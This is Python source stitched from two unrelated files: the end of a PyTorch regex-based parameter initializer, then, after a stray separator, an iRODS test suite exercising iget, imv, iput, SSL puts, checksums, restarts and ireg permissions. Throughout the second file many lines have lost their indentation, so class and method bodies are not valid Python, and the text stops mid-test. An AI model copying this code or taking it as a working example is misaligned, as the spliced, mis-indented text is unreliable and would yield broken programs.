        # Collapse all prevent patterns into a single alternation so a single
        # `re.search` decides whether a parameter is protected.
        self._prevent_regex = None
        if prevent_regexes:
            self._prevent_regex = "(" + ")|(".join(prevent_regexes) + ")"

    def __call__(self, module: torch.nn.Module) -> None:
        """
        Applies an initializer to all parameters in a module that match one of the regexes we were
        given in this object's constructor. Does nothing to parameters that do not match.

        # Parameters

        module : torch.nn.Module, required.
            The Pytorch module to apply the initializers to.
        """
        logger.info("Initializing parameters")
        unused_regexes = {initializer[0] for initializer in self._initializers}
        uninitialized_parameters = set()
        # Store which initializers were applied to which parameters.
        for name, parameter in module.named_parameters():
            # The prevent check depends only on the parameter name, so evaluate it
            # once per parameter instead of once per (parameter, regex) pair.
            if self._prevent_regex is not None and bool(re.search(self._prevent_regex, name)):
                # Protected parameters keep their default initialization.
                uninitialized_parameters.add(name)
                continue
            for initializer_regex, initializer in self._initializers:
                if re.search(initializer_regex, name):
                    logger.info("Initializing %s using %s initializer", name, initializer_regex)
                    initializer(parameter, parameter_name=name)
                    unused_regexes.discard(initializer_regex)
                    break
            else:  # no break
                uninitialized_parameters.add(name)
        for regex in unused_regexes:
            logger.warning("Did not use initialization regex that was passed: %s", regex)
        logger.info(
            "Done initializing parameters; the following parameters are using their "
            "default initialization from their code"
        )
        uninitialized_parameter_list = list(uninitialized_parameters)
        uninitialized_parameter_list.sort()
        for name in uninitialized_parameter_list:
            logger.info("   %s", name)
|
import sys
if (sys.version_info >= (2, 7)):
import unittest
else:
import unittest2 as unittest
import pydevtest_common
from pydevtest_common import assertiCmd, assertiCmdFail, interruptiCmd, create_local_testfile, create_local_largefile, get_hostname, RUN_IN_TOPOLOGY, get_irods_top_level_dir, get_irods_config_dir, mod_json_file
import pydevtest_sessions as s
import commands
import os
import shlex
import datetime
import time
import psutil
import base64
import hashlib
class ResourceBase(object):
    """Common fixture logic shared by the resource test suites.

    Holds the canonical names of the test file/collection/resources and
    provides setup/teardown helpers that create and destroy them in iRODS.
    """

    def __init__(self):
        # Fixture names used throughout the suites; tests reference these
        # attributes rather than hard-coding the strings.
        print "in ResourceBase.__init__"
        self.testfile = "pydevtest_testfile.txt"
        self.testdir = "pydevtest_testdir"
        self.testresc = "pydevtest_TestResc"
        self.anotherresc = "pydevtest_AnotherResc"

    def run_resource_setup(self):
        """Create the resource under test plus generic test resources, files,
        and permissions. Order matters: the resource-specific setup commands
        run first, then the shared fixtures are layered on top.
        """
        # NOTE(review): `self.my_test_resource` is not set in this class --
        # presumably the concrete subclass provides it; confirm.
        # set up resource itself
        for i in self.my_test_resource["setup"]:
            parameters = shlex.split(i)  # preserves quoted substrings
            if parameters[0] == "iadmin":
                print s.adminsession.runAdminCmd(parameters[0], parameters[1:])
            else:
                output = commands.getstatusoutput(" ".join(parameters))
                print output
        # set up test resource
        print "run_resource_setup - creating test resources"
        output = commands.getstatusoutput("hostname")
        hostname = output[1]
        s.adminsession.runAdminCmd(
            'iadmin', ["mkresc", self.testresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.testresc])
        s.adminsession.runAdminCmd(
            'iadmin', ["mkresc", self.anotherresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.anotherresc])
        # set up test files
        print "run_resource_setup - generating local testfile"
        f = open(self.testfile, 'wb')
        f.write("I AM A TESTFILE -- [" + self.testfile + "]")
        f.close()
        print "run_resource_setup - adding testfile to grid"
        s.adminsession.runCmd('imkdir', [self.testdir])
        s.adminsession.runCmd('iput', [self.testfile])
        print "run_resource_setup - adding testfile to grid public directory"
        s.adminsession.runCmd('icp', [self.testfile, "../../public/"])  # copy of testfile into public
        print "run_resource_setup - setting permissions"
        # permissions
        s.adminsession.runCmd(
            'ichmod', ["read", s.users[1]['name'], "../../public/" + self.testfile])  # read for user1
        s.adminsession.runCmd(
            'ichmod', ["write", s.users[2]['name'], "../../public/" + self.testfile])  # write for user2
        # set test group
        self.testgroup = s.testgroup
        print "run_resource_setup - END"

    def run_resource_teardown(self):
        """Undo run_resource_setup: remove local and grid files, trash,
        the helper resources, and finally the resource under test itself."""
        print "run_resource_teardown - BEGIN"
        # local file cleanup
        print "run_resource_teardown - removing local testfile"
        os.unlink(self.testfile)
        # remove grid test files
        print "run_resource_teardown - removing testfile from grid public directory"
        s.adminsession.runCmd('icd')
        s.adminsession.runCmd('irm', [self.testfile, "../public/" + self.testfile])
        # remove any bundle files
        print "run_resource_teardown - removing any bundle files"
        # NOTE(review): unlike the surrounding calls, the whole command line is
        # passed as a single string here -- presumably runCmd tolerates that;
        # verify against its implementation.
        s.adminsession.runCmd('irm -rf ../../bundle')
        # tear down admin session files
        print "run_resource_teardown - admin session removing session files"
        s.adminsession.runCmd('irm', ['-r', s.adminsession.sessionId])
        # clean trash
        print "run_resource_teardown - clean trash"
        s.adminsession.runCmd('irmtrash', ['-M'])
        # remove resc
        print "run_resource_teardown - removing test resources"
        s.adminsession.runAdminCmd('iadmin', ['rmresc', self.testresc])
        s.adminsession.runAdminCmd('iadmin', ['rmresc', self.anotherresc])
        # tear down resource itself
        print "run_resource_teardown - tearing down actual resource"
        for i in self.my_test_resource["teardown"]:
            parameters = shlex.split(i)  # preserves quoted substrings
            if parameters[0] == "iadmin":
                print s.adminsession.runAdminCmd(parameters[0], parameters[1:])
            else:
                output = commands.getstatusoutput(" ".join(parameters))
                print output
        print "run_resource_teardown - END"
class ShortAndSuite(ResourceBase):
def __init__(self):
print "in ShortAndSuite.__init__"
ResourceBase.__init__(self)
def test_awesome(self):
print "AWESOME!"
def test_local_iget(self):
print self.testfile
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
class ResourceSuite(ResourceBase):
'''Define the tests to be run for a resource type.
This class is designed to be used as a base class by developers
when they write tests for their own resource plugins.
All these tests will be inherited and the developer can add
any new tests for new functionality or replace any tests
they need to modify.
'''
    def __init__(self):
        # Announce construction for easier log reading, then delegate all
        # fixture-name setup to the ResourceBase constructor.
        print "in ResourceSuite.__init__"
        ResourceBase.__init__(self)
###################
# iget
###################
def test_local_iget(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_overwrite(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
assertiCmdFail(s.adminsession, "iget " + self.testfile + " " + localfile) # already exists
assertiCmd(s.adminsession, "iget -f " + self.testfile + " " + localfile) # already exists, so force
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
    def test_local_iget_with_bad_option(self):
        # assertions
        # iget must reject an unknown command-line flag
        assertiCmdFail(s.adminsession, "iget -z")  # run iget with bad option
def test_iget_with_purgec(self):
# local setup
filename = "purgecgetfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "iget -f --purgec " + filename) # get file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# imv
###################
def test_local_imv(self):
# local setup
movedfile = "moved_file.txt"
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + movedfile) # move
assertiCmd(s.adminsession, "ils -L " + movedfile, "LIST", movedfile) # should be listed
# local cleanup
    def test_local_imv_to_directory(self):
        # local setup
        # assertions
        # moving a data object into a collection relocates it there
        assertiCmd(s.adminsession, "imv " + self.testfile + " " + self.testdir)  # move
        assertiCmd(s.adminsession, "ils -L " + self.testdir, "LIST", self.testfile)  # should be listed
        # local cleanup
def test_local_imv_to_existing_filename(self):
# local setup
copyfile = "anotherfile.txt"
# assertions
assertiCmd(s.adminsession, "icp " + self.testfile + " " + copyfile) # icp
# cannot overwrite existing file
assertiCmd(s.adminsession, "imv " + self.testfile + " " + copyfile, "ERROR", "CAT_NAME_EXISTS_AS_DATAOBJ")
# local cleanup
###################
# iphymv
###################
    def test_iphymv_to_nonexistent_resource(self):
        # a physical move to an unknown resource must fail; the surrounding
        # ils calls are only for debug output and confirm the listing is intact
        assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile)  # debug
        assertiCmd(s.adminsession, "iphymv -R nonexistentresc " + self.testfile,
                   "STDERR", "SYS_RESC_DOES_NOT_EXIST")  # should fail
        assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile)  # debug
###################
# iput
###################
    def test_ssl_iput_with_rods_env(self):
        """Round-trip an iput over SSL configured via the client irods_environment.json.

        Generates a throwaway self-signed server certificate and DH params,
        points the client environment at them with CS_NEG_REQUIRE, restarts
        the server so it picks the settings up, then puts and lists a file.
        """
        # set up client and server side for ssl handshake

        # server side certificate setup
        os.system("openssl genrsa -out server.key 2> /dev/null")
        os.system("openssl req -batch -new -key server.key -out server.csr")
        os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
        os.system("mv server.crt chain.pem")
        # normally 2048, but smaller size here for speed
        os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")

        # add client irodsEnv settings
        clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
        # keep a pristine copy so the environment can be restored afterwards
        os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
        env = {}
        env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
        env['irods_ssl_certificate_chain_file'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
        env['irods_ssl_certificate_key_file'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
        env['irods_ssl_dh_params_file'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
        env['irods_ssl_verify_server'] = "none"
        mod_json_file(clientEnvFile, env)

        # server needs the environment variable to
        # read the correctly changed environment

        # server reboot to pick up new irodsEnv settings
        env_val = s.adminsession.sessionDir + "/irods_environment.json"
        sys_cmd = "export IRODS_ENVIRONMENT_FILE=" + env_val + ";" + \
            get_irods_top_level_dir() + "/iRODS/irodsctl restart"
        os.system(sys_cmd)

        # do the encrypted put
        filename = "encryptedfile.txt"
        filepath = create_local_testfile(filename)
        assertiCmd(s.adminsession, "iinit rods")  # reinitialize
        # small file
        assertiCmd(s.adminsession, "iput " + filename)  # encrypted put - small file
        assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # should be listed

        # reset client environment to not require SSL
        os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))

        # clean up generated SSL material and the local test file
        os.system("rm server.key server.csr chain.pem dhparams.pem")
        os.remove(filename)
    def test_ssl_iput_small_and_large_files(self):
        """Put both a small and a ~60MB file over SSL configured via environment
        variables (server side) plus irods_environment.json (client side)."""
        # set up client and server side for ssl handshake

        # server side certificate setup
        os.system("openssl genrsa -out server.key 2> /dev/null")
        os.system("openssl req -batch -new -key server.key -out server.csr")
        os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
        os.system("mv server.crt chain.pem")
        # normally 2048, but smaller size here for speed
        os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")

        # server side environment variables
        os.environ['irodsSSLCertificateChainFile'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
        os.environ['irodsSSLCertificateKeyFile'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
        os.environ['irodsSSLDHParamsFile'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"

        # client side environment variables
        os.environ['irodsSSLVerifyServer'] = "none"

        # add client irodsEnv settings
        clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
        # keep a pristine copy so the environment can be restored afterwards
        os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
        env = {}
        env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
        mod_json_file(clientEnvFile, env)

        # server reboot to pick up new irodsEnv settings
        os.system(get_irods_top_level_dir() + "/iRODS/irodsctl restart")

        # do the encrypted put
        filename = "encryptedfile.txt"
        filepath = create_local_testfile(filename)
        assertiCmd(s.adminsession, "iinit rods")  # reinitialize
        # small file
        assertiCmd(s.adminsession, "iput " + filename)  # encrypted put - small file
        assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # should be listed
        # large file
        largefilename = "BIGencryptedfile.txt"
        # 60MB of zeros exercises the multi-threaded transfer path
        output = commands.getstatusoutput('dd if=/dev/zero of=' + largefilename + ' bs=1M count=60')
        assert output[0] == 0, "dd did not successfully exit"
        #os.system("ls -al "+largefilename)
        assertiCmd(s.adminsession, "iput " + largefilename)  # encrypted put - large file
        assertiCmd(s.adminsession, "ils -L " + largefilename, "LIST", largefilename)  # should be listed

        # reset client environment to not require SSL
        os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))

        # clean up generated SSL material and the local test files
        os.system("rm server.key server.csr chain.pem dhparams.pem")
        os.remove(filename)
        os.remove(largefilename)
@unittest.skipIf(psutil.disk_usage('/').free < 20000000000, "not enough free space for 5 x 2.3GB file ( local + iput + 3 repl children )")
def test_local_iput_with_really_big_file__ticket_1623(self):
# regression test against ticket [#1623]
# bigfilesize = [2287636992] is just under 'int' threshold
# bigfilesize = [2297714688] is just big enough to trip 'int' size error buffers
# local setup
big = "reallybigfile.txt"
bigger = "tmp.txt"
f = open(big, 'wb')
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvg34eere----2")
f.close()
for i in range(9):
commands.getstatusoutput(
"cat " + big + " " + big + " " + big + " " + big + " " + big + " " + big + " > " + bigger)
os.rename(bigger, big)
datafilename = big
# assertions
print "bigfilesize = [" + str(os.stat(datafilename).st_size) + "]"
# should not be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "ERROR", [datafilename, "does not exist"])
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput(self):
'''also needs to count and confirm number of replicas after the put'''
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
    def test_local_iput_overwrite(self):
        # putting an object that already exists must fail unless forced with -f
        assertiCmdFail(s.adminsession, "iput " + self.testfile)  # fail, already exists
        assertiCmd(s.adminsession, "iput -f " + self.testfile)  # iput again, force
    def test_local_iput_recursive(self):
        # TODO(review): stub -- only names a directory and never exercises
        # "iput -r"; presumably unfinished, confirm intent before relying on it
        recursivedirname = "dir"
def test_local_iput_lower_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -k " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_upper_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -K " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_onto_specific_resource(self):
# local setup
datafilename = "anotherfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", self.testresc) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_interrupt_directory(self):
# local setup
datadir = "newdatadir"
output = commands.getstatusoutput('mkdir ' + datadir)
datafiles = ["file1", "file2", "file3", "file4", "file5", "file6", "file7"]
for datafilename in datafiles:
print "-------------------"
print "creating " + datafilename + "..."
localpath = datadir + "/" + datafilename
output = commands.getstatusoutput('dd if=/dev/zero of=' + localpath + ' bs=1M count=20')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
rf = "collectionrestartfile"
# assertions
iputcmd = "iput -X " + rf + " -r " + datadir
if os.path.exists(rf):
os.unlink(rf)
interruptiCmd(s.adminsession, iputcmd, rf, 10) # once restartfile reaches 10 bytes
assert os.path.exists(rf), rf + " should now exist, but did not"
output = commands.getstatusoutput('cat ' + rf)
print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datadir) # just to show contents
assertiCmd(s.adminsession, iputcmd, "LIST", "File last completed") # confirm the restart
for datafilename in datafiles:
assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm -rf ' + datadir)
output = commands.getstatusoutput('rm ' + rf)
    def test_local_iput_interrupt_largefile(self):
        """Interrupt a single large-file iput, then restart it with --lfrestart
        and confirm the object finally matches the on-disk size."""
        # local setup
        datafilename = "bigfile"
        print "-------------------"
        print "creating " + datafilename + "..."
        output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=150')
        print output[1]
        assert output[0] == 0, "dd did not successfully exit"
        rf = "bigrestartfile"
        # assertions
        iputcmd = "iput --lfrestart " + rf + " " + datafilename
        # start from a clean slate: a stale restart file would skip the interrupt
        if os.path.exists(rf):
            os.unlink(rf)
        interruptiCmd(s.adminsession, iputcmd, rf, 10)  # once restartfile reaches 10 bytes
        time.sleep(2)  # wait for all interrupted threads to exit
        assert os.path.exists(rf), rf + " should now exist, but did not"
        output = commands.getstatusoutput('cat ' + rf)
        print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
        today = datetime.date.today()
        # length should not be zero
        assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", [" 0 " + today.isoformat(), datafilename])
        # confirm the restart
        assertiCmd(s.adminsession, iputcmd, "LIST", datafilename + " was restarted successfully")
        assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST",
                   [" " + str(os.stat(datafilename).st_size) + " " + today.isoformat(), datafilename])  # length should be size on disk
        # local cleanup
        output = commands.getstatusoutput('rm ' + datafilename)
        output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_physicalpath_no_permission(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "iput -p /newfileinroot.txt " + datafilename, "ERROR",
["UNIX_FILE_CREATE_ERR", "Permission denied"]) # should fail to write
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_physicalpath(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
fullpath = get_irods_top_level_dir() + "/newphysicalpath.txt"
assertiCmd(s.adminsession, "iput -p " + fullpath + " " + datafilename) # should complete
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", fullpath) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_admin_local_iput_relative_physicalpath_into_server_bin(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
relpath = "relativephysicalpath.txt"
# should disallow relative path
assertiCmd(s.adminsession, "iput -p " + relpath + " " + datafilename, "ERROR", "absolute")
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_relative_physicalpath_into_server_bin(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
relpath = "relativephysicalpath.txt"
assertiCmd(s.sessions[1], "iput -p " + relpath + " " + datafilename, "ERROR", "absolute") # should error
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_with_changed_target_filename(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
changedfilename = "different.txt"
assertiCmd(s.adminsession, "iput " + datafilename + " " + changedfilename) # should complete
assertiCmd(s.adminsession, "ils -L " + changedfilename, "LIST", changedfilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
    @unittest.skip("TODO: revisit later, this is causing issues with mysql")
    def test_local_iput_collision_with_wlock(self):
        """Run five concurrent forced iputs of the same file with --wlock.

        With write locking every process is expected to succeed, and the
        staggered first process guarantees total runtime exceeds `initialdelay`.
        """
        # local setup
        datafilename = "collisionfile1.txt"
        print "-------------------"
        print "creating " + datafilename + "..."
        output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
        print output[1]
        assert output[0] == 0, "dd did not successfully exit"
        # assertions
        begin = time.time()
        errorflag = False
        procs = set()
        pids = set()
        # start multiple icommands in parallel
        initialdelay = 3  # seconds
        for i in range(5):
            if i == 0:
                # add a three second delay before the first icommand
                p = s.adminsession.runCmd(
                    'iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=initialdelay)
            else:
                p = s.adminsession.runCmd('iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=0)
            procs.add(p)
            pids.add(p.pid)
        # reap children as they finish, reporting each one's exit status/output
        while pids:
            pid, retval = os.wait()
            for proc in procs:
                if proc.pid == pid:
                    print "pid " + str(pid) + ":"
                    if retval != 0:
                        print " * ERROR occurred * <------------"
                        errorflag = True
                    print " retval [" + str(retval) + "]"
                    print " stdout [" + proc.stdout.read().strip() + "]"
                    print " stderr [" + proc.stderr.read().strip() + "]"
                    pids.remove(pid)
        elapsed = time.time() - begin
        print "\ntotal time [" + str(elapsed) + "]"
        # the delayed first iput must have pushed total runtime past the delay
        assert elapsed > initialdelay
        # local cleanup
        output = commands.getstatusoutput('rm ' + datafilename)
        assert errorflag == False, "oops, had an error"
    @unittest.skip("TODO: revisit later, not sure this is testing anything of interest")
    def test_local_iput_collision_without_wlock(self):
        """Run seven concurrent forced iputs of the same file WITHOUT --wlock.

        Without write locking, collisions are expected: the test asserts that
        at least one of the parallel iputs fails.
        """
        # local setup
        datafilename = "collisionfile2.txt"
        print "-------------------"
        print "creating " + datafilename + "..."
        output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
        print output[1]
        assert output[0] == 0, "dd did not successfully exit"
        # assertions
        begin = time.time()
        errorflag = False
        procs = set()
        pids = set()
        # start multiple icommands in parallel
        initialdelay = 3  # seconds
        for i in range(7):
            if i == 0:
                # add a three second delay before the first icommand
                p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=initialdelay)
            else:
                p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=0)
            procs.add(p)
            pids.add(p.pid)
        # reap children as they finish; a nonzero exit is the expected outcome
        while pids:
            pid, retval = os.wait()
            for proc in procs:
                if proc.pid == pid:
                    print "pid " + str(pid) + ":"
                    if retval != 0:
                        errorflag = True
                    else:
                        print " * Unexpectedly, No ERROR occurred * <------------"
                    print " retval [" + str(retval) + "]"
                    print " stdout [" + proc.stdout.read().strip() + "]"
                    print " stderr [" + proc.stderr.read().strip() + "]"
                    pids.remove(pid)
        elapsed = time.time() - begin
        print "\ntotal time [" + str(elapsed) + "]"
        # local cleanup
        output = commands.getstatusoutput('rm ' + datafilename)
        assert errorflag == True, "Expected ERRORs did not occur"
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_iput_overwrite_others_file__ticket_2086(self):
# pre state
assertiCmd(s.adminsession, "ils -L", "LIST", self.testfile) # should be listed
# local setup
filename = "overwritefile.txt"
filepath = create_local_testfile(filename)
# alice tries to put
homepath = "/home/" + s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + self.testfile
logicalpath = "/" + s.adminsession.getZoneName() + homepath
assertiCmd(s.sessions[1], "iput " + filepath + " " + logicalpath, "ERROR", "CAT_NO_ACCESS_PERMISSION") # iput
# check physicalpaths (of all replicas)
cmdout = s.adminsession.runCmd('ils', ['-L'])
print "[ils -L]:"
print "[" + cmdout[0] + "]"
lines = cmdout[0].splitlines()
for l in cmdout[0].splitlines():
if "demoResc" in l:
if "/session-" in l:
physicalpath = l.split()[2]
# check file is on disk
print "[ls -l " + physicalpath + "]:"
os.system("ls -l " + physicalpath)
assert os.path.exists(physicalpath)
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_iput_with_purgec(self):
# local setup
filename = "purgecfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput --purgec " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_local_iput_with_force_and_destination_resource__ticket_1706(self):
# local setup
filename = "iputwithforceanddestination.txt"
filepath = create_local_testfile(filename)
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)
# overwrite test repl with different data
assertiCmd(s.adminsession, "iput -f -R %s %s %s" % (self.testresc, doublefile, filename))
# default resource should have dirty copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + filename])
# default resource should not have doublesize file
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " " + filename])
# targeted resource should have new double clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " " + doublesize + " ", "& " + filename])
# local cleanup
os.remove(filepath)
os.remove(doublefile)
###################
# ireg
###################
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsadmin(self):
# local setup
filename = "newfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "ireg " + filepath + " /" + s.adminsession.getZoneName() + "/home/" +
s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + filename) # ireg
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser(self):
# local setup
filename = "newfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED") # ireg
assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename) # should not be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser_in_vault(self):
# get vault base path
cmdout = s.sessions[1].runCmd('iquest', ["%s", "select RESC_VAULT_PATH where RESC_NAME = 'demoResc'"])
vaultpath = cmdout[0].rstrip('\n')
# make dir in vault if necessary
